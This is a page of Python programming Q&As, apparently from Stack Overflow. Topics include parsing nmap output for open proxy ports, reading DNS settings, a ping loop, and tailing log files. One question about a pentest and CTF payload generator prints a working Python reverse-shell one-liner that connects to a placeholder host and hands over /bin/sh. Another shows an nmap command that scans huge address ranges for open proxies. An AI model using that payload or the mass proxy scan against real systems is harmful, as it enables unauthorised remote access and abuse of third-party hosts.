Any way to optimize/properly refine this <50 line script? - python

I'm still learning python, and one of the first projects I decided to dive into was something to sort through large nmap logs, pull out the OPEN ports, and dump them to a separate text file in IP:Port format. It works, but is there a better way to write this? Here's what I ended up with:
import sys
import string
"""
Written 6/24/2011 to pull out OPEN ports of an nmap proxy scan
Command:
nmap 218.9-255.0-255.0-255 -p 8080,3128,1080 -M 50 -oG PLog3.txt
"""
if len(sys.argv) != 3:
    print 'Usage: python proxy.py <input file> <output file>'
    print 'nmap 218.1-255.0-255.0-255 -p 8080,3128,1080 -M 50 -oG PLog.txt'
    print 'Example: python ./proxy.py PLog.txt proxies.txt'
    sys.exit(1)

r = open(sys.argv[1], 'r')
o = open(sys.argv[2], 'w')
pat80 = '80/open/'
pat8080 = '8080/open'
pat3128 = '3128/open'

for curline in r.xreadlines():
    sift = string.split(curline, ' ')
    ip = sift[1]
    if curline.find(pat3128) >= 0:
        curport = '3128'
    elif curline.find(pat8080) >= 0:
        curport = '8080'
    elif curline.find(pat80) >= 0:
        curport = '80'
    else:
        curport = '100'
        pass
    if (curport == '3128') or (curport == '8080') or (curport == '80'):
        o.write(ip + ':' + curport + '\n')
        print ip + ':' + curport
    else:
        pass

You can loop over a file directly; there is no need to use xreadlines(). The with statement makes sure the file is closed when the block exits:
with open(sys.argv[1], 'r') as r:
    for curline in r:
        sift = string.split(curline, ' ')
        ip = sift[1]
        ...
Checking membership in a tuple is neater than the chain of or comparisons:
if curport in ('3128', '8080', '80'):
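Putting those two suggestions together, the whole loop might look roughly like this (just a sketch, reusing the pattern variables from the original script):
with open(sys.argv[1], 'r') as r, open(sys.argv[2], 'w') as o:
    for curline in r:
        ip = curline.split(' ')[1]
        if pat3128 in curline:
            curport = '3128'
        elif pat8080 in curline:
            curport = '8080'
        elif pat80 in curline:
            curport = '80'
        else:
            curport = None
        if curport in ('3128', '8080', '80'):
            o.write(ip + ':' + curport + '\n')
            print(ip + ':' + curport)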

Since using Python to parse nmap output files was one of my first Python applications, I can make a couple of recommendations:
1) If you'd like to learn XML parsing in Python, using nmap's alternate XML output format (-oX) would be advised. This has the advantage that the XML output is less likely to change in small but script-breaking ways, unlike the plain-text output. (Basically, matching on string fields is great for a quick hack but is almost guaranteed to bite you down the road, as I found out when nmap was updated and they slightly changed the format of one of the columns I was parsing on. I also think I got bitten when we upgraded one of the Windows boxes and some text in the OS or services fields matched something I was matching on.) If you're interested in going down this path, I can see if I still have my xpath-based nmap parser lying around.
2) If you want to stick with text output and regexp, I'd suggest learning about grouping.
Specifically, rather than creating custom patterns for each port, you can define a group and check that out instead.
import re
r = re.compile(r"(\d+)/open")  # match one or more digits followed by /open
mm = r.search(line)  # mm will either be None or a match object; if mm is not None,
                     # you can do mm.groups()[0] to get the port #.
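Applied to a grepable-output line, that might look like this (the sample line below is made up purely for illustration):
import re

port_re = re.compile(r"(\d+)/open")

line = "Host: 218.9.1.2 ()  Ports: 3128/open/tcp//squid-http///, 8080/closed/tcp//http-proxy///"
ip = line.split(' ')[1]
for port in port_re.findall(line):   # every port reported as open on this line
    print(ip + ':' + port)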

import sys

"""
Written 6/24/2011 to pull out OPEN ports of an nmap proxy scan
Command:
nmap 218.9-255.0-255.0-255 -p 8080,3128,1080 -M 50 -oG PLog3.txt
"""

def get_port(line):
    port_mapping = {
        '80/open/': '80',  # Is the trailing slash special here?
                           # If they're really all supposed to have the same form,
                           # then we can simplify more.
        '8080/open': '8080',
        '3128/open': '3128'
    }
    for pattern, port in port_mapping.items():
        if pattern in line: return port
    return None  # this would be implied otherwise,
                 # but "explicit is better than implicit"
                 # and this function intends to return a value.

def main(in_name, out_name):
    with open(in_name, 'r') as in_file:
        results = ((line.split(' ')[1], get_port(line)) for line in in_file)
        with open(out_name, 'w') as out_file:
            for ip, port in results:
                if port is None: continue
                output = '%s:%s' % (ip, port)
                out_file.write(output + '\n')
                print output

def usage():
    print 'Usage: python proxy.py <input file> <output file>'
    print 'nmap 218.1-255.0-255.0-255 -p 8080,3128,1080 -M 50 -oG PLog.txt'
    print 'Example: python ./proxy.py PLog.txt proxies.txt'

if __name__ == '__main__':
    if len(sys.argv) != 3: usage()
    else: main(*sys.argv[1:])

Check out argparse for handling the arguments.
Split into functions.
Use the main construct.
Look at the csv module. You can set the delimiter to a space.
Look again at the re expression. You can do it with one re expression that is an 'or' of the different patterns (see the sketch below).
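A rough sketch of what those recommendations might look like together, using argparse for the arguments and a single alternation regex for the ports (the port list is just the one from the original script; this is illustrative, not a drop-in replacement):
import argparse
import re

PORT_RE = re.compile(r"\b(80|3128|8080)/open\b")

def main():
    parser = argparse.ArgumentParser(
        description='Extract open proxy ports from nmap -oG output')
    parser.add_argument('infile', type=argparse.FileType('r'))
    parser.add_argument('outfile', type=argparse.FileType('w'))
    args = parser.parse_args()

    for line in args.infile:
        match = PORT_RE.search(line)
        if match is None:
            continue
        ip = line.split(' ')[1]
        entry = '%s:%s' % (ip, match.group(1))
        args.outfile.write(entry + '\n')
        print(entry)

if __name__ == '__main__':
    main()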

Related

Removing multiple strings in a file replace() not working

I am at the moment experiencing some issues with my code. I am creating a reverse shell generator that automates payload generation for pentests and Capture the Flag competitions.
The script reads a file containing payloads, fetches a specific line, replaces the back-connect IP address and port, and outputs the finished payload to the user.
However, I am stuck on an issue: I am trying to replace two different strings after reading the file, but only one of the strings gets replaced, while the other does not.
Strings to be replaced:
[ip]
[port]
I have also reviewed a previous article that uses regex, but had no luck with that either; I receive an "unexpected token" error on the regex part that is commented out in my code.
My code:
import socket
import base64
import hashlib
import re
import os        # Fetching ip from interface
import linecache # for reading specific lines

ip = str(input("Host ip\n"))
port = str(input("port\n"))
#shell = str(input("Please select an option?\n"))

def full():
    print("Welcome, lets generate a choosen reverse shell\n")
    global ip
    global port
    print("please select language and shell option:\n [1] - python(Alphanumeric reverse shell)\n, [2] PHP(Alphanumeric reverse shell)\n")
    selection = input("Type in number:\t")
    if int(selection) == 1:
        with open("myshells.txt", "r") as shells:
            #for myreplace in (("[ip]", ip), ("[port]", port)):
            fetchshell = linecache.getline('myshells.txt', 1)
            ipreplaced = fetchshell.replace("[ip]", ip)
            ipreplaced = fetchshell.replace("[port]", port)
            print(ipreplaced)
            """for line in fetchshell:
                myport = line.write(re.sub(r"(port)", port))
                myip = line.write((re.sub(r"(ip)", ip))
                print(line)"""
File contents:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(([ip],[port]));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Sample output from above code:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(([ip],22));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
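The behaviour in the sample output follows from the two replace() calls above both starting from the original fetchshell string, so the second call discards the result of the first. A minimal sketch of one common fix, chaining the replacements (names taken from the question):
fetchshell = linecache.getline('myshells.txt', 1)
payload = fetchshell.replace("[ip]", ip).replace("[port]", port)
print(payload)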

Get local DNS settings in Python

Is there any elegant and cross platform (Python) way to get the local DNS settings?
It could probably work with a complex combination of modules such as platform and subprocess, but maybe there is already a good module, such as netifaces, which can retrieve it at a low level and save some "reinventing the wheel" effort.
Less ideally, one could probably query something like dig, but I find that "noisy", because it would run an extra request instead of just retrieving something which already exists locally.
Any ideas?
Using subprocess you could do something like this on a MacBook or Linux system:
import subprocess

process = subprocess.Popen(['cat', '/etc/resolv.conf'],
                           stdout=subprocess.PIPE,
                           stderr=subprocess.PIPE)
stdout, stderr = process.communicate()
print(stdout, stderr)
or do something like this
import subprocess

with open('dns.txt', 'w') as f:
    process = subprocess.Popen(['cat', '/etc/resolv.conf'], stdout=f)
The first output will go to stdout and the second to a file
Maybe this one will solve your problem
import subprocess

def get_local_dns(cmd_):
    with open('dns1.txt', 'w+') as f:
        with open('dns_log1.txt', 'w+') as flog:
            try:
                process = subprocess.Popen(cmd_, stdout=f, stderr=flog)
            except FileNotFoundError as e:
                flog.write(f"Error while executing this command {str(e)}")

linux_cmd = ['cat', '/etc/resolv.conf']
windows_cmd = ['windows_command', 'parameters']
commands = [linux_cmd, windows_cmd]

if __name__ == "__main__":
    for cmd in commands:
        get_local_dns(cmd)
Thanks @MasterOfTheHouse.
I ended up writing my own function. It's not so elegant, but it does the job for now. There's plenty of room for improvement, but well...
import os
import subprocess

def get_dns_settings() -> dict:
    # Initialize the output variables
    dns_ns, dns_search = [], ''

    # For Unix based OSs
    if os.path.isfile('/etc/resolv.conf'):
        for line in open('/etc/resolv.conf', 'r'):
            if line.strip().startswith('nameserver'):
                nameserver = line.split()[1].strip()
                dns_ns.append(nameserver)
            elif line.strip().startswith('search'):
                search = line.split()[1].strip()
                dns_search = search
    # If it is not a Unix based OS, try "the Windows way"
    elif os.name == 'nt':
        cmd = 'ipconfig /all'
        raw_ipconfig = subprocess.check_output(cmd)
        # Convert the bytes into a string
        ipconfig_str = raw_ipconfig.decode('cp850')
        # Convert the string into a list of lines
        ipconfig_lines = ipconfig_str.split('\n')

        for n in range(len(ipconfig_lines)):
            line = ipconfig_lines[n]
            # Parse nameserver in current line and next ones
            if line.strip().startswith('DNS-Server'):
                nameserver = ':'.join(line.split(':')[1:]).strip()
                dns_ns.append(nameserver)
                next_line = ipconfig_lines[n+1]
                # If there's too much blank at the beginning, assume we have
                # another nameserver on the next line
                if len(next_line) - len(next_line.strip()) > 10:
                    dns_ns.append(next_line.strip())
                    next_next_line = ipconfig_lines[n+2]
                    if len(next_next_line) - len(next_next_line.strip()) > 10:
                        dns_ns.append(next_next_line.strip())
            elif line.strip().startswith('DNS-Suffix'):
                dns_search = line.split(':')[1].strip()

    return {'nameservers': dns_ns, 'search': dns_search}

print(get_dns_settings())
By the way... how did you manage to write two answers with the same account?
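If pulling in a third-party dependency is acceptable, the dnspython package can also expose the local resolver configuration (it reads /etc/resolv.conf on Unix-like systems and the registry on Windows); a minimal sketch, assuming dnspython is installed:
import dns.resolver  # pip install dnspython

resolver = dns.resolver.Resolver()  # loads the system resolver configuration
print(resolver.nameservers)         # list of configured nameserver addresses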

Python3 inconsistent output inside open function and for loop

This is the code. Somehow the output is not consistent: there is an extra newline for the first two lines in ip.txt, while the third works as expected.
code.py
import subprocess

with open('ip.txt') as f:
    for IPAddr in f:
        ping = subprocess.Popen(['ping','-c','1',IPAddr],stdout=f).wait()
        if ping == 0:
            print(f'{IPAddr} is up')
        else:
            print(f'{IPAddr} is down')
ip.txt
127.0.0.1
10.0.0.1
127.0.0.1
Output
user@linux:~$ python 01.py
127.0.0.1
is up
10.0.0.1
is down
127.0.0.1 is up
user@linux:~$
Desired Output
user@linux:~$ python code.py
127.0.0.1 is up
10.0.0.1 is down
127.0.0.1 is up
user@linux:~$
What's wrong with this code and how to fix it?
Update
The following solutions work! Many thanks
IPAddr = IPAddr.replace('\n','')
IPAddr = IPAddr.rstrip("\n")
IPAddr = IPAddr.strip()
You're including the newline characters from your file in your print.
Remove the \n like this:
import subprocess

with open('ip.txt') as f:
    for IPAddr in f:
        IPAddr = IPAddr.replace('\n', '')  # Remove the newline
        ping = subprocess.Popen(['ping','-c','1',IPAddr],stdout=f).wait()
        if ping == 0:
            print(f'{IPAddr} is up')
        else:
            print(f'{IPAddr} is down')
Or if you want to do it more broadly, you can remove all whitespace by using:
IPAddr = IPAddr.strip()
Or if you want to be super duper efficient, just strip the \n from the right:
IPAddr = IPAddr.rstrip("\n")
When iterating over a file line by line, each line ends with the newline marker ("\n"), so what you pass to print() is actually "127.0.0.1\n is up", not "127.0.0.1 is up".
The solution is quite simple: remove the newline:
for IPAddr in f:
    IPAddr = IPAddr.rstrip("\n")
    # etc
Note that since external inputs (files, user input, etc.) are totally unreliable, you would be better off stripping all whitespace from the line, checking that it is not empty (it is common to have empty lines in text files, especially at the end) and skipping it with a continue statement if it is, and, if it is not empty, validating that the value is a valid IP address (and skipping it too if not).
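A minimal sketch of that kind of input hygiene, using the standard library ipaddress module (the file name and ping invocation are just illustrative):
import ipaddress
import subprocess

with open('ip.txt') as f:
    for raw in f:
        candidate = raw.strip()
        if not candidate:
            continue                         # skip blank lines
        try:
            ipaddress.ip_address(candidate)  # raises ValueError if not a valid IP
        except ValueError:
            continue                         # skip anything that is not an IP address
        ping = subprocess.run(['ping', '-c', '1', candidate],
                              stdout=subprocess.DEVNULL).returncode
        print(f'{candidate} is {"up" if ping == 0 else "down"}')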

python: tail file in background [duplicate]

I'd like to make the output of tail -F or something similar available to me in Python without blocking or locking. I've found some really old code to do that here, but I'm thinking there must be a better way or a library to do the same thing by now. Anyone know of one?
Ideally, I'd have something like tail.getNewData() that I could call every time I wanted more data.
Non Blocking
If you are on linux (as windows does not support calling select on files) you can use the subprocess module along with the select module.
import time
import subprocess
import select
f = subprocess.Popen(['tail','-F',filename],\
        stdout=subprocess.PIPE,stderr=subprocess.PIPE)
p = select.poll()
p.register(f.stdout)

while True:
    if p.poll(1):
        print f.stdout.readline()
    time.sleep(1)
This polls the output pipe for new data and prints it when it is available. Normally the time.sleep(1) and print f.stdout.readline() would be replaced with useful code.
Blocking
You can use the subprocess module without the extra select module calls.
import subprocess
f = subprocess.Popen(['tail','-F',filename],\
        stdout=subprocess.PIPE,stderr=subprocess.PIPE)
while True:
    line = f.stdout.readline()
    print line
This will also print new lines as they are added, but it will block until the tail program is closed, probably with f.kill().
Using the sh module (pip install sh):
from sh import tail
# runs forever
for line in tail("-f", "/var/log/some_log_file.log", _iter=True):
print(line)
[update]
Since sh.tail with _iter=True is a generator, you can:
import sh
tail = sh.tail("-f", "/var/log/some_log_file.log", _iter=True)
Then you can "getNewData" with:
new_data = tail.next()
Note that if the tail buffer is empty, it will block until there is more data (from your question it is not clear what you want to do in this case).
[update]
This works if you replace -f with -F, but in Python it would be locking. I'd be more interested in having a function I could call to get new data when I want it, if that's possible. – Eli
A container generator placing the tail call inside a while True loop and catching eventual I/O exceptions will have almost the same effect of -F.
def tail_F(some_file):
    while True:
        try:
            for line in sh.tail("-f", some_file, _iter=True):
                yield line
        except sh.ErrorReturnCode_1:
            yield None
If the file becomes inaccessible, the generator will return None. However, it still blocks until there is new data if the file is accessible. It remains unclear to me what you want to do in this case.
Raymond Hettinger approach seems pretty good:
import os

def tail_F(some_file):
    first_call = True
    while True:
        try:
            with open(some_file) as input:
                if first_call:
                    input.seek(0, 2)
                    first_call = False
                latest_data = input.read()
                while True:
                    if '\n' not in latest_data:
                        latest_data += input.read()
                        if '\n' not in latest_data:
                            yield ''
                            if not os.path.isfile(some_file):
                                break
                            continue
                    latest_lines = latest_data.split('\n')
                    if latest_data[-1] != '\n':
                        latest_data = latest_lines[-1]
                    else:
                        latest_data = input.read()
                    for line in latest_lines[:-1]:
                        yield line + '\n'
        except IOError:
            yield ''
This generator will return '' if the file becomes inaccessible or if there is no new data.
[update]
The second to last answer circles around to the top of the file it seems whenever it runs out of data. – Eli
I think the second will output the last ten lines whenever the tail process ends, which with -f is whenever there is an I/O error. The tail --follow --retry behavior is not far from this for most cases I can think of in unix-like environments.
Perhaps if you update your question to explain what is your real goal (the reason why you want to mimic tail --retry), you will get a better answer.
The last answer does not actually follow the tail and merely reads what's available at run time. – Eli
Of course, tail will display the last 10 lines by default... You can position the file pointer at the end of the file using file.seek; I will leave a proper implementation as an exercise for the reader.
IMHO the file.read() approach is far more elegant than a subprocess based solution.
Purely pythonic solution using non-blocking readline()
Adapting Ijaz Ahmad Khan's answer to only yield lines when they are completely written (i.e. they end with a newline character) gives a pythonic solution with no external dependencies:
import time
from typing import Iterator

def follow(file, sleep_sec=0.1) -> Iterator[str]:
    """ Yield each line from a file as they are written.
    `sleep_sec` is the time to sleep after empty reads. """
    line = ''
    while True:
        tmp = file.readline()
        if tmp:  # readline() returns '' (not None) when there is no new data
            line += tmp
            if line.endswith("\n"):
                yield line
                line = ''
        elif sleep_sec:
            time.sleep(sleep_sec)

if __name__ == '__main__':
    with open("test.txt", 'r') as file:
        for line in follow(file):
            print(line, end='')
The only portable way to tail -f a file appears to be, in fact, to read from it and retry (after a sleep) if the read returns 0. The tail utilities on various platforms use platform-specific tricks (e.g. kqueue on BSD) to efficiently tail a file forever without needing sleep.
Therefore, implementing a good tail -f purely in Python is probably not a good idea, since you would have to use the least-common-denominator implementation (without resorting to platform-specific hacks). Using a simple subprocess to open tail -f and iterating through the lines in a separate thread, you can easily implement a non-blocking tail operation in Python.
Example implementation:
import threading, Queue, subprocess

tailq = Queue.Queue(maxsize=10)  # buffer at most 10 lines

def tail_forever(fn):
    p = subprocess.Popen(["tail", "-f", fn], stdout=subprocess.PIPE)
    while 1:
        line = p.stdout.readline()
        tailq.put(line)
        if not line:
            break

threading.Thread(target=tail_forever, args=(fn,)).start()

print tailq.get()         # blocks
print tailq.get_nowait()  # throws Queue.Empty if there are no lines to read
All the answers that use tail -f are not pythonic.
Here is the pythonic way: ( using no external tool or library)
import time

def follow(thefile):
    while True:
        line = thefile.readline()
        if not line or not line.endswith('\n'):
            time.sleep(0.1)
            continue
        yield line

if __name__ == '__main__':
    logfile = open("run/foo/access-log","r")
    loglines = follow(logfile)
    for line in loglines:
        print(line, end='')
So, this is coming quite late, but I ran into the same problem again, and there's a much better solution now. Just use pygtail:
Pygtail reads log file lines that have not been read. It will even
handle log files that have been rotated. Based on logcheck's logtail2
(http://logcheck.org)
Ideally, I'd have something like tail.getNewData() that I could call every time I wanted more data
We've already got one and it's very nice. Just call f.read() whenever you want more data. It will start reading where the previous read left off and it will read through the end of the data stream:
f = open('somefile.log')
p = 0
while True:
    f.seek(p)
    latest_data = f.read()
    p = f.tell()
    if latest_data:
        print latest_data
        print str(p).center(10).center(80, '=')
For reading line-by-line, use f.readline(). Sometimes, the file being read will end with a partially read line. Handle that case with f.tell() finding the current file position and using f.seek() for moving the file pointer back to the beginning of the incomplete line. See this ActiveState recipe for working code.
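A rough sketch of that readline()/tell()/seek() idea (not the ActiveState recipe itself, just an illustration of the technique described above):
import time

def follow_lines(path):
    """Yield complete lines appended to *path*, rereading partial lines later."""
    with open(path) as f:
        f.seek(0, 2)                  # start at the current end of the file
        while True:
            pos = f.tell()            # remember where this read attempt started
            line = f.readline()
            if line.endswith('\n'):
                yield line
            else:
                f.seek(pos)           # incomplete (or empty) line: rewind and retry later
                time.sleep(0.5)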
You could use the 'tailer' library: https://pypi.python.org/pypi/tailer/
It has an option to get the last few lines:
# Get the last 3 lines of the file
tailer.tail(open('test.txt'), 3)
# ['Line 9', 'Line 10', 'Line 11']
And it can also follow a file:
# Follow the file as it grows
for line in tailer.follow(open('test.txt')):
    print line
If one wants tail-like behaviour, that one seems to be a good option.
Another option is the tailhead library, which provides Python versions of both the tail and head utilities, plus an API that can be used in your own module.
Originally based on the tailer module, its main advantage is the ability to follow files by path, i.e. it can handle the situation where a file is recreated. Besides that, it has some bug fixes for various edge cases.
Python is "batteries included" - it has a nice solution for it: https://pypi.python.org/pypi/pygtail
Reads log file lines that have not been read. Remembers where it finished last time, and continues from there.
import sys
from pygtail import Pygtail
for line in Pygtail("some.log"):
    sys.stdout.write(line)
You can also use the 'AWK' command.
See more at: http://www.unix.com/shell-programming-scripting/41734-how-print-specific-lines-awk.html
awk can be used to tail last line, last few lines or any line in a file.
This can be called from python.
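For example, a small sketch of calling awk from Python to grab the last line of a file (awk's END block runs after the last record has been read; the file name here is just illustrative):
import subprocess

last_line = subprocess.check_output(['awk', 'END { print }', 'access.log'],
                                    universal_newlines=True).rstrip('\n')
print(last_line)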
If you are on Linux, you can implement a non-blocking version in Python in the following way.
import subprocess
subprocess.call('xterm -title log -hold -e \"tail -f filename\"&', shell=True, executable='/bin/csh')
print "Done"
# -*- coding:utf-8 -*-
import sys
import time

class Tail():
    def __init__(self, file_name, callback=sys.stdout.write):
        self.file_name = file_name
        self.callback = callback

    def follow(self, n=10):
        try:
            # Open the file
            with open(self.file_name, 'r', encoding='UTF-8') as f:
            # with open(self.file_name,'rb') as f:
                self._file = f
                self._file.seek(0, 2)
                # Record the length of the file (in characters)
                self.file_length = self._file.tell()
                # Print the last n lines (10 by default)
                self.showLastLine(n)
                # Keep reading the file and print whatever gets appended
                while True:
                    line = self._file.readline()
                    if line:
                        self.callback(line)
                    time.sleep(1)
        except Exception as e:
            print('Failed to open the file; check whether it exists and whether you have permission to read it')
            print(e)

    def showLastLine(self, n):
        # Assume a line is roughly 100 characters; 1 or 1000 would also work
        len_line = 100
        # n defaults to 10, but can also be passed in through follow()
        read_len = len_line * n
        # last_lines will hold the lines we finally print
        while True:
            # If the amount we want to read is larger than the stored file length,
            # just read the whole file and break
            if read_len > self.file_length:
                self._file.seek(0)
                last_lines = self._file.read().split('\n')[-n:]
                break
            # Otherwise read read_len characters and count the newlines in them
            self._file.seek(-read_len, 2)
            last_words = self._file.read(read_len)
            # count is the number of newlines
            count = last_words.count('\n')
            if count >= n:
                # Enough newlines: just take the last n lines
                last_lines = last_words.split('\n')[-n:]
                break
            # Not enough newlines yet
            else:
                # If there is no newline at all, assume a line is about read_len characters
                if count == 0:
                    len_perline = read_len
                # Otherwise estimate the average line length from the newlines seen so far
                else:
                    len_perline = read_len / count
                # Increase the amount to read and try again
                read_len = len_perline * n
        for line in last_lines:
            self.callback(line + '\n')

if __name__ == '__main__':
    py_tail = Tail('test.txt')
    py_tail.follow(1)
A simple tail function from the PyPI package tailread.
You can also install it via pip install tailread.
Recommended for tail access of large files.
from io import BufferedReader

def readlines(bytesio, batch_size=1024, keepends=True, **encoding_kwargs):
    '''bytesio: file path or BufferedReader
    batch_size: size to be processed
    '''
    path = None
    if isinstance(bytesio, str):
        path = bytesio
        bytesio = open(path, 'rb')
    elif not isinstance(bytesio, BufferedReader):
        raise TypeError('The first argument to readlines must be a file path or a BufferedReader')

    bytesio.seek(0, 2)
    end = bytesio.tell()

    buf = b""
    for p in reversed(range(0, end, batch_size)):
        bytesio.seek(p)
        lines = []
        remain = min(end - p, batch_size)
        while remain > 0:
            line = bytesio.readline()[:remain]
            lines.append(line)
            remain -= len(line)

        cut, *parsed = lines
        for line in reversed(parsed):
            if buf:
                line += buf
                buf = b""
            if encoding_kwargs:
                line = line.decode(**encoding_kwargs)
            yield from reversed(line.splitlines(keepends))
        buf = cut + buf

    if path:
        bytesio.close()

    if encoding_kwargs:
        buf = buf.decode(**encoding_kwargs)
    yield from reversed(buf.splitlines(keepends))

for line in readlines('access.log', encoding='utf-8', errors='replace'):
    print(line)
    if 'line 8' in line:
        break
# line 11
# line 10
# line 9
# line 8

tail multiple logfiles in python

This is probably a bit of a silly exercise for me, but it raises a bunch of interesting questions. I have a directory of logfiles from my chat client, and I want to be notified using notify-osd every time one of them changes.
The script that I wrote basically uses os.popen to run the linux tail command on every one of the files to get the last line, and then check each line against a dictionary of what the lines were the last time it ran. If the line changed, it used pynotify to send me a notification.
This script actually worked perfectly, except for the fact that it used a huge amount of cpu (probably because it was running tail about 16 times every time the loop ran, on files that were mounted over sshfs.)
It seems like something like this would be a great solution, but I don't see how to implement that for more than one file.
Here is the script that I wrote. Pardon my lack of comments and poor style.
Edit: To clarify, this is all linux on a desktop.
Not even looking at your source code, there are two ways you could easily do this more efficiently and handle multiple files.
1) Don't bother running tail unless you have to. Simply os.stat all of the files and record the last modified time. If the last modified time is different, then raise a notification.
2) Use pyinotify to call out to Linux's inotify facility; this will have the kernel do option 1 for you and call back to you when any files in your directory change. Then translate the callback into your osd notification.
Now, there might be some trickiness depending on how many notifications you want when there are multiple messages and whether you care about missing a notification for a message.
An approach that preserves the use of tail would be to instead use tail -f. Open all of the files with tail -f and then use the select module to have the OS tell you when there's additional input on one of the file descriptors open for tail -f. Your main loop would call select and then iterate over each of the readable descriptors to generate notifications. (You could probably do this without using tail and just calling readline() when it's readable.)
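A rough sketch of that select-based approach, with one tail -F subprocess per file (the file names are made up, and this simply prints to stdout instead of raising a notification):
import select
import subprocess

paths = ['chat1.log', 'chat2.log']
procs = {}
for path in paths:
    p = subprocess.Popen(['tail', '-F', path],
                         stdout=subprocess.PIPE,
                         universal_newlines=True)
    procs[p.stdout.fileno()] = (path, p)

while True:
    # Block until at least one of the tail processes has produced output.
    readable, _, _ = select.select(list(procs), [], [])
    for fd in readable:
        path, p = procs[fd]
        line = p.stdout.readline()
        if line:
            print('%s: %s' % (path, line.rstrip('\n')))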
Other areas of improvement in your script:
Use os.listdir and native Python filtering (say, using list comprehensions) instead of a popen with a bunch of grep filters.
Update the list of buffers to scan periodically instead of only doing it at program boot.
Use subprocess.Popen instead of os.popen.
If you're already using the pyinotify module, it's easy to do this in pure Python (i.e. no need to spawn a separate process to tail each file).
Here is an example that is event-driven by inotify, and should use very little cpu. When IN_MODIFY occurs for a given path we read all available data from the file handle and output any complete lines found, buffering the incomplete line until more data is available:
import os
import select
import sys
import pynotify
import pyinotify

class Watcher(pyinotify.ProcessEvent):
    def __init__(self, paths):
        self._manager = pyinotify.WatchManager()
        self._notify = pyinotify.Notifier(self._manager, self)
        self._paths = {}
        for path in paths:
            self._manager.add_watch(path, pyinotify.IN_MODIFY)
            fh = open(path, 'rb')
            fh.seek(0, os.SEEK_END)
            self._paths[os.path.realpath(path)] = [fh, '']

    def run(self):
        while True:
            self._notify.process_events()
            if self._notify.check_events():
                self._notify.read_events()

    def process_default(self, evt):
        path = evt.pathname
        fh, buf = self._paths[path]
        data = fh.read()
        lines = data.split('\n')
        # output previous incomplete line.
        if buf:
            lines[0] = buf + lines[0]
            buf = ''  # the saved fragment has now been consumed
        # only output the last line if it was complete.
        if lines[-1]:
            buf = lines[-1]
        lines.pop()
        # display a notification
        notice = pynotify.Notification('%s changed' % path, '\n'.join(lines))
        notice.show()
        # and output to stdout
        for line in lines:
            sys.stdout.write(path + ': ' + line + '\n')
        sys.stdout.flush()
        self._paths[path][1] = buf

pynotify.init('watcher')
paths = sys.argv[1:]
Watcher(paths).run()
Usage:
% python watcher.py [path1 path2 ... pathN]
Simple pure-Python solution (not the best, but it doesn't fork, spits out 4 empty lines after an idle period, and marks the source of each chunk every time it changes):
#!/usr/bin/env python
from __future__ import with_statement
'''
Implement multi-file tail
'''
import os
import sys
import time

def print_file_from(filename, pos):
    with open(filename, 'rb') as fh:
        fh.seek(pos)
        while True:
            chunk = fh.read(8192)
            if not chunk:
                break
            sys.stdout.write(chunk)

def _fstat(filename):
    st_results = os.stat(filename)
    return (st_results[6], st_results[8])

def _print_if_needed(filename, last_stats, no_fn, last_fn):
    changed = False
    # Find the size of the file and move to the end
    tup = _fstat(filename)
    # print tup
    if last_stats[filename] != tup:
        changed = True
        if not no_fn and last_fn != filename:
            print '\n<%s>' % filename
        print_file_from(filename, last_stats[filename][0])
        last_stats[filename] = tup
    return changed

def multi_tail(filenames, stdout=sys.stdout, interval=1, idle=10, no_fn=False):
    S = lambda (st_size, st_mtime): (max(0, st_size - 124), st_mtime)
    last_stats = dict((fn, S(_fstat(fn))) for fn in filenames)
    last_fn = None
    last_print = 0

    while 1:
        # print last_stats
        changed = False
        for filename in filenames:
            if _print_if_needed(filename, last_stats, no_fn, last_fn):
                changed = True
                last_fn = filename
        if changed:
            if idle > 0:
                last_print = time.time()
        else:
            if idle > 0 and last_print is not None:
                if time.time() - last_print >= idle:
                    last_print = None
                    print '\n' * 4
        time.sleep(interval)

if '__main__' == __name__:
    from optparse import OptionParser
    op = OptionParser()
    op.add_option('-F', '--no-fn', help="don't print filename when changes",
                  default=False, action='store_true')
    op.add_option('-i', '--idle', help='idle time, in seconds (0 turns off)',
                  type='int', default=10)
    op.add_option('--interval', help='check interval, in seconds', type='int',
                  default=1)

    opts, args = op.parse_args()

    try:
        multi_tail(args, interval=opts.interval, idle=opts.idle,
                   no_fn=opts.no_fn)
    except KeyboardInterrupt:
        pass
